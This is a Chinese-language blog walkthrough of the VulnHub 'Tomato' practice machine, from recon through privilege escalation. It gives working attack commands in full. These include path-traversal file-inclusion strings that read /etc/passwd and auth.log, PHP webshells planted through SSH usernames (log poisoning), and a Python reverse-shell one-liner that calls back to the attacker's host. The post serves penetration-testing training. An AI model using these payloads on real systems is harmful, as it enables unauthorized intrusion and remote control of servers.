VulnHub-Tomato靶机详细渗透过程

最新推荐文章于 2024-05-12 12:36:27 发布
最新推荐文章于 2024-05-12 12:36:27 发布
阅读量1k 收藏 8
点赞数 2
分类专栏: 教程 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MRS_jianai/article/details/128395979
版权

1.靶机部署

下载地址:https://drive.google.com/file/d/1EpagpWtgjqTGc80g9U_E09m3cI0si_8R/view?usp=sharing
打开VMware,在文件中选择打开:
image.png
找到靶机的ova文件,打开
image.png
输入靶机名称并选择存放地址:
image.png
等待导入:
image.png
编辑虚拟机设置:
image.png
配置自己给,网络模式我这里选择NAT,只要和kali在同一网段下即可:
image.png
开启虚拟机:
image.png
导入成功!!!

2.信息收集

2.1 探测靶机IP

使用netdiscover扫描一个段内存货的主机,得到主机的IP地址:

netdiscover

image.png

2.2 端口扫描

使用nmap对靶机进行详细的扫描:

nmap -A -T4 -p- 192.168.11.146

-A:使用所有高级扫描选项
-T4:设置时许,越高扫描越快
-p-:全端口扫描

image.png

2.3 敏感目录扫描

dirb http://192.168.11.146

image.png

2.4 信息收集总结

IP:192.168.11.146
开放端口:21、80、2211、8888
敏感目录:http://192.168.11.146/antibot_image/

3.渗透过程

3.1 漏洞发现

登录网站:
image.png
并未发现有用信息!!!
访问敏感目录:
image.png
发现一堆东西,但不知道干嘛的!!!
经过一番搜寻,在http://192.168.11.146/antibot_image/antibots/info.php页面,查看源代码发现东西。
image.png

3.2 文件包含漏洞利用

通过分析,该页面的源码中存在include,文件包含漏洞,我们尝试用该漏洞查看passwd文件,发现可以成功。

?image=../../../../../../../etc/passwd

image.png
既然可以查看密码文件,那我们尝试查看一下其他文件。
查看日志文件,日志文件记录了其他用户的一些操作,其中或许留有线索。

?image=../../../../../../../var/log/auth.log

image.png
发现该文件还记录了ssh登录的登录日志,无论登录成功与否都有记录,那么我们是否也可以使用这个机制写入一句一句话木马。

3.3 反弹shell-1

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

ssh '<?php @eval($_POST[pass]);?'@192.168.11.146 -p 2211

image.png
写入之后我们使用蚁剑进行连接:

URL地址:http://192.168.11.146/antibot_image/antibots/info.php?image=../../../../../../../var/log/auth.log
密码:pass

image.png
连接成功后打开终端:
image.png
image.png

3.4 反弹shell-2

除上面使用一句话木马的方法之外,我们还可以使用语言进行反弹shell,
写入一句话木马:

ssh '<?php echo system($_GET["jason"]); ?>'@192.168.11.146 -p 2211

image.png
命令执行成功,说明一句话木马写入成功:

http://192.168.11.146/antibot_image/antibots/info.php?image=/var/log/auth.log&jason=id

image.png
kali开启监听:
image.png
浏览器输入反弹shell代码:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

浏览器代码:
http://192.168.11.146/antibot_image/antibots/info.php?image=/var/log/auth.log&jason=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.11.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
image.png
反弹shell的方法还有很多,这里列举了两种,方法不限,我们的最终目的是拿到shell

3.5 生成可交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

image.png

3.6 提权

查看系统内核版本:

uname -a

image.png
发现系统内核是:Linux ubuntu 4.4.0-21-generic,在kali中查找该系统内核的提权包:
image.png
这里不知道的话一个一个试,最后经过尝试得到可以使用45010,将次包下载下来:
image.png
因为此文件是一个C语言源码文件,需要编译才能够运行,这种情况最好是在目标服务器上进行编译并运行,但目标靶机没有gcc环境,意味着没办法进行编译,在这里选择在kali上编译完成后,在靶机上运行程序:
编译:

gcc 45010.c -o exp

image.png
将编译后的文件传输到目标靶机上:
我这里使用ftp服务的方式,kali开启ftp服务:
image.png
靶机下载:
注意:为了避免权限不足问题,我们可以在靶机的tmp文件中进行操作:
image.png
给予文件可执行权限:
image.png
执行文件:
image.png
不出意外的报错了!!!
这是因为最近我kali缺GLIBC_2.34,我的kali是2.36,2.34装了好久装不上,但是到这一步应该是成功了,后续我解决了这个问题会在此修正,如果你跟我一样,可以百度“GLIBC_2.34 not found”试着解决一下,也可以评论区教教我!!!
image.png

小秋LY
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Vulnhub-Tomato靶机实战
御七彩虹猫
05-06 967
Vulnhub-Tomato靶机实战
tomato-靶机渗透测试
m0_54323635的博客
10-09 184
tomato-靶机渗透测试
2024年最新靶机实战系列之Tomato靶机,2024年最新神级Golang进阶笔记
最新发布
2401_84919661的博客
05-12 258
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。(都打包成一块的了,不能一一展开,总共300多集)同样的在日志文件中确实发现了存在相关记录。1.6 反弹shell。
靶场通关 | Tomato靶机通关秘籍~
鱼溯的博客
10-20 1035
靶场通关 | Tomato靶机通关秘籍~
VulnhubTomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1455
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
靶机实战系列之Tomato靶机
Javachichi的博客
02-07 1051
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
Tomato靶机渗透
qq_44732584的博客
03-23 424
渗透测试
【打靶记录】VulnHub-Tomato靶机渗透wp
qq_39972370的博客
11-17 1567
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞。
vim-airline-tomato:番茄技术
02-01
然后,可以通过Vim的包管理器如Vundle或NeoBundle进行安装,或者使用git克隆`vim-airline-tomato-master`仓库到`.vim/pack`目录下。安装完成后,需要在`.vimrc`配置文件中启用该插件,并根据需要进行个性化设置。 #...
data-tomato-strong
06-08
标题 "data-tomato-strong" 和描述 "data_tomato_strong_stem+tomato" 暗示了我们正在处理一个与数据处理、可能是图像识别相关的项目,其中"tomato"可能是关键词或者数据集的名称。标签 "yolo" 是 "You Only Look ...
Tomato-Phoenix-V106-繁体版
06-01
"Tomato-Phoenix-V106-繁体版" 是一个特定版本的固件更新,主要针对路由器设备,特别是那些支持Tomato固件系列的路由器。Tomato是一种开源的、高度自定义的路由器固件,它基于Linux内核,提供了一系列高级功能,使...
Ace-Tomato-Company
03-13
在压缩包文件`Ace-Tomato-Company-master`中,我们可以推测这包含的是Ace番茄公司某项目的源代码或资源库的主分支。"master"通常指的是Git版本控制系统中的主分支,代表了项目的主线开发。这个压缩包可能包含了以下...
【愚公系列】2023年06月 网络安全高级班 101.CTF黑客比赛(Tomato靶机
时光隧道
06-05 4311
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞。Tomatosecurity官网提供了Tomato靶机的下载和使用说明。
tomato靶机打靶过程及思路
qq_52610024的博客
05-30 423
5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成。3.发现info.php提示文件包含,读取到/var/log/auth.log,可以用ssh登录传入一句话木马,2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径。用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息。-i&32>&3);1.常规端口及服务发现。...
已饱和,未来程序员真没法再干了?_程序员干不了活(1),HarmonyOS鸿蒙 基础面试
2401_84181501的博客
04-15 347
是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
vulnhub靶场-tomato
qq_42947816的博客
03-07 7519
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1519
小白学渗透
Vulnhub靶机TOMATO_ 1
LainWith的博客
08-29 1073
系列Tomato(此系列共1台)发布日期:2020年09月14日注释:使用vmwar workstation运行虚拟机难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径爬取文件包含写入日志内核漏洞枚举本地提权。...
请讲解将可执行文件加载到PYNQ-Z2中详细步骤
04-09
Sure! Here are the steps to load executable files into PYNQ-Z2: 1. Connect your PYNQ-Z2 board to your computer using a USB cable. 2. Open a terminal window on your computer and establish a connection with the board by entering the following command: ssh xilinx@192.168.2.99 (if this is the IP address of your board) 3. Navigate to the directory where your executable file is located using the cd command. 4. Use the scp command to copy the executable file to the /home/xilinx directory on your PYNQ-Z2 board. For example: scp your_executable_file xilinx@192.168.2.99:/home/xilinx/. 5. Once the executable file is on your board, you can execute it by navigating to the /home/xilinx directory and entering the command: ./your_executable_file I hope that helps! Let me know if you have any other questions. And as for what you said earlier, why did the tomato turn red? Because it saw the salad dressing!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值